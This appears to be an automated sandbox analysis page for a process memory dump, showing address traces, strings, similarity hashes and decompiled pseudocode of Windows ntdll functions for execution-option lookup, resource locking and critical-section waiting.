0x1eb48b1f
0x1eb48b25
0x1eb48b2b
0x1eb48b31
0x1eb48b37
0x1eb48b3d
0x1eb48b46
0x1eb48b46
0x1eb487c6
0x1eb487d0
0x1eb91ae0
0x1eb91ae6
0x1eb91af8
0x1eb91af8
0x1eb91afd
0x1eb91afe
0x1eb91b01
0x1eb91b06
0x1eb91b06
0x1eb487d6
0x1eb487f2
0x1eb487f7
0x1eb48807
0x1eb4880a
0x1eb4880f
0x1eb48810
0x1eb48813
0x1eb48818
0x1eb48818
0x1eb4882c
0x1eb48831
0x1eb48838
0x1eb48908
0x1eb48920
0x1eb489f0
0x1eb48a08
0x1eb48af6
0x1eb48af6
0x1eb48af8
0x1eb48afb
0x1eb91beb
0x1eb91beb
0x1eb48b04
0x1eb91bf8
0x1eb91c0e
0x1eb91c13
0x1eb91c16
0x1eb91c16
0x1eb91bf8
0x00000000
0x1eb48b04
0x1eb48a0e
0x1eb48a11
0x1eb48a14
0x1eb48a15
0x1eb48a18
0x1eb48a22
0x1eb48b59
0x1eb48a28
0x1eb48a3c
0x1eb48a3c
0x1eb48a42
0x1eb91bb0
0x1eb91b11
0x1eb91b11
0x00000000
0x1eb48a48
0x1eb48a51
0x1eb48a5b
0x1eb48a5e
0x1eb48a61
0x1eb48a69
0x1eb48a69
0x1eb48a6d
0x00000000
0x00000000
0x1eb48a74
0x1eb48a7c
0x1eb48a7d
0x1eb48a91
0x1eb48a93
0x1eb48a93
0x1eb48a98
0x1eb48a9b
0x1eb48aa1
0x1eb48aa1
0x1eb48aa4
0x1eb48aaa
0x1eb48ab1
0x1eb48ac5
0x1eb48ac7
0x1eb48ac7
0x1eb48ac5
0x1eb48ace
0x1eb91bc9
0x1eb91bce
0x1eb91bd2
0x1eb91bd2
0x1eb48ad8
0x1eb48aeb
0x1eb48aeb
0x1eb48af0
0x1eb48af4
0x00000000
0x1eb48af4
0x1eb48a42
0x1eb48926
0x1eb48929
0x1eb4892c
0x1eb4892d
0x1eb48930
0x1eb48935
0x1eb4893a
0x1eb48b51
0x1eb48940
0x1eb48954
0x1eb48954
0x1eb4895a
0x1eb91b63
0x00000000
0x1eb48960
0x1eb48969
0x1eb48973
0x1eb48976
0x1eb48979
0x1eb4897e
0x1eb48981
0x1eb48981
0x1eb48986
0x00000000
0x00000000
0x1eb91b6e
0x1eb91b74
0x1eb91b7b
0x1eb91b8f
0x1eb91b91
0x1eb91b91
0x1eb91b99
0x1eb91b9c
0x1eb91ba2
0x1eb91ba2
0x1eb4898c
0x1eb48992
0x1eb48999
0x1eb489ad
0x1eb91ba8
0x1eb91ba8
0x1eb489ad
0x1eb489b6
0x1eb489c8
0x1eb489cd
0x1eb489d0
0x1eb489d0
0x1eb489d6
0x1eb489e8
0x1eb489e8
0x1eb489ed
0x00000000
0x1eb489ed
0x1eb4895a
0x1eb4883e
0x1eb48841
0x1eb48844
0x1eb48845
0x1eb48848
0x1eb4884d
0x1eb48852
0x1eb48b49
0x1eb48858
0x1eb4886c
0x1eb4886c
0x1eb48872
0x1eb91b0e
0x00000000
0x1eb48878
0x1eb48881
0x1eb4888b
0x1eb4888e
0x1eb48891
0x1eb48896
0x1eb48899
0x1eb48899
0x1eb4889e
0x00000000
0x00000000
0x1eb91b21
0x1eb91b27
0x1eb91b2e
0x1eb91b42
0x1eb91b44
0x1eb91b44
0x1eb91b4c
0x1eb91b4f
0x1eb91b55
0x1eb91b55
0x1eb488a4
0x1eb488aa
0x1eb488b1
0x1eb488c5
0x1eb91b5b
0x1eb91b5b
0x1eb488c5
0x1eb488ce
0x1eb488e0
0x1eb488e5
0x1eb488e8
0x1eb488e8
0x1eb488ee
0x1eb48900
0x1eb48900
0x1eb48905
0x00000000
0x1eb48905

APIs

_wcspbrk.LIBCMT ref: 1EB48891
_wcspbrk.LIBCMT ref: 1EB48979
_wcspbrk.LIBCMT ref: 1EB48A61
_wcspbrk.LIBCMT ref: 1EB48A9B
_wcspbrk.LIBCMT ref: 1EB91B9C

Strings

WindowsExcludedProcs, xrefs: 1EB487C1
Kernel-MUI-Number-Allowed, xrefs: 1EB487E6
Kernel-MUI-Language-Disallowed, xrefs: 1EB48914
Kernel-MUI-Language-SKU, xrefs: 1EB489FC
Kernel-MUI-Language-Allowed, xrefs: 1EB48827

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 1e9cb40952eec42b05d6cd00a1498aa10b184c84be85fd5e4bc4fe1930fa10d8
Instruction ID: 6b7080c9e6d69cb6008521dba454c0fa02cf98fffbecd5c1d5999c66e74faf9c
Opcode Fuzzy Hash: 1e9cb40952eec42b05d6cd00a1498aa10b184c84be85fd5e4bc4fe1930fa10d8
Instruction Fuzzy Hash: ACF1C9B5D10249EFCF11DF95C9809EEBBF9FF08300F6146AAE506A7210D735AA45EB50

Uniqueness

Uniqueness Score: -1.00%

Function 1EB57EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E1EB57EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x1ec02088; // 0x77474aff
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E1EB57F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E1EB73F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E1EB2DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x1ec04218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E1EB73F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E1EB30D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E1EB73F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E1EB38375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E1EB73F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E1EB9E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E1EB73F92();
					_t38 = 1;
					L2:
					return E1EB2E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x1eb57f08
0x1eb57f0f
0x1eb57f12
0x1eb57f1b
0x1eb57f31
0x1eb73ead
0x1eb73eb4
0x00000000
0x00000000
0x1eb73eba
0x1eb73ecd
0x1eb73ed2
0x1eb73ee1
0x1eb73ee7
0x1eb73eec
0x1eb73f12
0x1eb73f18
0x1eb73f1a
0x00000000
0x00000000
0x1eb73f20
0x1eb73f26
0x1eb73f28
0x00000000
0x00000000
0x1eb73f2e
0x1eb73f30
0x00000000
0x00000000
0x1eb73f3a
0x1eb73f3b
0x1eb73f53
0x1eb73f64
0x1eb73f69
0x1eb73f6c
0x1eb73f6d
0x1eb73f6f
0x1eb7e304
0x1eb7e30f
0x1eb7e315
0x1eb7e31e
0x1eb7e321
0x1eb7e327
0x1eb7e329
0x00000000
0x00000000
0x00000000
0x00000000
0x1eb7e32f
0x1eb7e32f
0x1eb7e337
0x1eb7e33a
0x1eb7e33b
0x1eb7e33d
0x1eb7e33f
0x1eb7e341
0x1eb7e341
0x1eb7e34e
0x1eb7e353
0x1eb7e358
0x1eb7e35d
0x1eb7e35f
0x00000000
0x00000000
0x1eb7e365
0x1eb7e365
0x1eb7e368
0x1eb7e36e
0x00000000
0x00000000
0x1eb7e374
0x1eb7e32f
0x1eb73f75
0x1eb73f7a
0x1eb73f7c
0x1eb73f7e
0x1eb73f86
0x1eb57f39
0x1eb57f47
0x1eb57f47
0x1eb57f37
0x1eb57f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 1EB73F12

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1EB7E2FB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1EB73F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1EB73F4A
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1EB73EC4
Execute=1, xrefs: 1EB73F5E
CLIENT(ntdll): Processing section info %ws..., xrefs: 1EB7E345
ExecuteOptions, xrefs: 1EB73F04

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: d1a2257bb05c8f3db48c066032e418a041c7e4956524fc7e855b50100bc1ab09
Instruction ID: 42ce39c53ffb989956078f8e4e155582a3fdd0326ee0f9225badb495a8056f45
Opcode Fuzzy Hash: d1a2257bb05c8f3db48c066032e418a041c7e4956524fc7e855b50100bc1ab09
Instruction Fuzzy Hash: B5410771A5025D7BDF21DA90DCD5FDABBBCAF14700F4006E9E548E6180EB30FA458B61

Uniqueness

Uniqueness Score: -1.00%

Function 1EB453A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E1EB453A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x1ec001c0;
									_push(_t92);
									_push(0);
									_t37 = E1EB1F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E1EB64FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E1EB73F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E1EB73F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E1EBA217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E1EB73F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E1EB63915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E1EB45384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E1EB1F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E1EB63915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E1EB1F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E1EB63915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E1EB1F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E1EB63915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E1EB45329(_t74, _t92);
													_push(1);
													return E1EB453A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x1eb453ab
0x1eb453ae
0x1eb453b1
0x1eb453b4
0x1eb453b7
0x1eb605b6
0x1eb605c0
0x1eb605c3
0x00000000
0x1eb605c9
0x1eb605c9
0x1eb605cc
0x1eb605d5
0x1eb605d5
0x1eb453bd
0x1eb453bd
0x1eb453bd
0x1eb453be
0x1eb453be
0x1eb453be
0x1eb453c0
0x00000000
0x00000000
0x1eb82269
0x1eb8226d
0x1eb82349
0x1eb8234d
0x1eb82273
0x1eb82276
0x1eb82279
0x1eb8227e
0x1eb82283
0x1eb82287
0x1eb8228a
0x1eb8228d
0x1eb8228f
0x1eb822bc
0x1eb822bc
0x1eb822bc
0x1eb822be
0x1eb822c4
0x1eb822cc
0x1eb822d0
0x1eb822d6
0x1eb822d7
0x1eb822da
0x1eb822df
0x1eb822e4
0x00000000
0x00000000
0x1eb822e6
0x1eb822e9
0x1eb822f4
0x1eb822f9
0x1eb822fa
0x1eb82305
0x1eb82314
0x1eb82319
0x1eb8231a
0x1eb8231d
0x1eb82320
0x1eb82323
0x1eb82323
0x1eb82328
0x1eb8232d
0x1eb8232f
0x1eb82331
0x1eb82336
0x1eb82336
0x1eb8233b
0x1eb8233d
0x1eb82350
0x1eb82351
0x1eb82356
0x1eb82359
0x1eb82359
0x1eb8235b
0x1eb8235d
0x1eb45367
0x1eb4536b
0x1eb45372
0x00000000
0x00000000
0x00000000
0x00000000
0x1eb82363
0x1eb82363
0x1eb82369
0x1eb8236a
0x1eb8236c
0x1eb82371
0x1eb82373
0x00000000
0x1eb82379
0x1eb82379
0x1eb8237a
0x1eb8237f
0x1eb8237f
0x1eb82385
0x1eb82386
0x1eb82389
0x1eb8238e
0x1eb82390
0x1eb45378
0x1eb4537c
0x1eb82396
0x1eb82396
0x1eb82397
0x1eb8239c
0x1eb823a2
0x1eb823a3
0x1eb823a6
0x1eb823ab
0x1eb823ad
0x00000000
0x1eb823b3
0x1eb823b3
0x1eb823b4
0x1eb823b9
0x1eb823ba
0x1eb823ba
0x1eb823bc
0x1eb823bf
0x00000000
0x00000000
0x1eb79153
0x1eb79158
0x1eb7915a
0x1eb7915e
0x1eb79160
0x00000000
0x1eb79166
0x1eb79166
0x1eb79171
0x1eb79176
0x1eb79176
0x00000000
0x1eb79160
0x1eb823c6
0x1eb823cb
0x1eb823d7
0x1eb823d7
0x1eb823ad
0x1eb82390
0x1eb82373
0x1eb8233f
0x1eb8233f
0x00000000
0x1eb8233f
0x1eb82291
0x1eb82291
0x1eb82293
0x1eb82295
0x1eb8229a
0x1eb822a1
0x1eb822a3
0x1eb822a7
0x1eb822a9
0x00000000
0x00000000
0x1eb822ab
0x1eb822ad
0x1eb822af
0x00000000
0x00000000
0x00000000
0x1eb822af
0x1eb822b1
0x1eb822b4
0x1eb822b4
0x1eb822b6
0x00000000
0x00000000
0x00000000
0x00000000
0x1eb822b6
0x1eb8228f
0x00000000
0x1eb8226d
0x1eb453cb
0x1eb453ce
0x1eb453d0
0x1eb453d4
0x1eb453d6
0x00000000
0x1eb453d8
0x1eb453e3
0x1eb453ea
0x1eb453ea
0x1eb453d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1EB822F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1EB822FC
RTL: Resource at %p, xrefs: 1EB8230B
RTL: Re-Waiting, xrefs: 1EB82328

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 4e828f6d94804aced67df4dcd90ac61cf166ed8c55bc7c4bb7c7be2408c2e901
Instruction ID: 6dc69e6b27db6ddd8c5cfbad352b33ef71d64b9034ef45bfb4701cfbb241848c
Opcode Fuzzy Hash: 4e828f6d94804aced67df4dcd90ac61cf166ed8c55bc7c4bb7c7be2408c2e901
Instruction Fuzzy Hash: E25158756217466BDB00CF24DC90F967BA9EF58720F214769FD4ADB680EB60F841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EB4EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E1EB4EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E1EB3DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x1ec0793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E1EB216C0(_t39);
				} else {
					_t40 = E1EB1F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E1EB63915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E1EB201A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x1ec0793c; // 0x0
								_push(_t85);
								_t44 = E1EB21F28(_t71);
							} else {
								_t44 = E1EB1F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E1EB63915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E1EBA2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E1EB4EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E1EB64FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E1EB73F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E1EB73F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x1ec020c0;
								if(_t85 != 0x1ec020c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E1EBA217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E1EB73F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x1eb4ec56
0x1eb4ec56
0x1eb4ec56
0x1eb4ec5c
0x1eb4ec64
0x1eb823e6
0x1eb823eb
0x1eb823eb
0x1eb4ec6a
0x1eb4ec6c
0x1eb4ec6f
0x1eb823f3
0x1eb823f8
0x1eb823fa
0x1eb823fc
0x1eb4ec75
0x1eb4ec76
0x1eb4ec76
0x1eb4ec7b
0x1eb4ec7c
0x1eb4ec7e
0x1eb82406
0x1eb82407
0x1eb8240c
0x1eb8240d
0x1eb8240d
0x1eb8240d
0x1eb82414
0x1eb82417
0x1eb8241e
0x1eb82435
0x1eb82438
0x1eb8243c
0x1eb8243f
0x1eb82442
0x1eb82443
0x1eb82446
0x1eb82449
0x1eb82453
0x1eb82455
0x1eb8245b
0x1eb8245b
0x1eb4eb99
0x1eb4eb99
0x1eb4eb9c
0x1eb4eb9d
0x1eb4eb9f
0x1eb4eba2
0x1eb82465
0x1eb8246b
0x1eb8246d
0x1eb4eba8
0x1eb4eba9
0x1eb4eba9
0x1eb4ebae
0x1eb4ebb3
0x1eb4ebb9
0x1eb4ebbb
0x1eb82513
0x1eb82514
0x1eb82519
0x1eb8251b
0x1eb4ec2a
0x1eb4ec2d
0x1eb4ec33
0x1eb4ec36
0x1eb4ec3a
0x1eb4ec3e
0x1eb4ec40
0x1eb4ec47
0x1eb4ec47
0x1eb4ec40
0x1eb222c6
0x1eb4ebc1
0x1eb4ebc1
0x1eb4ebc5
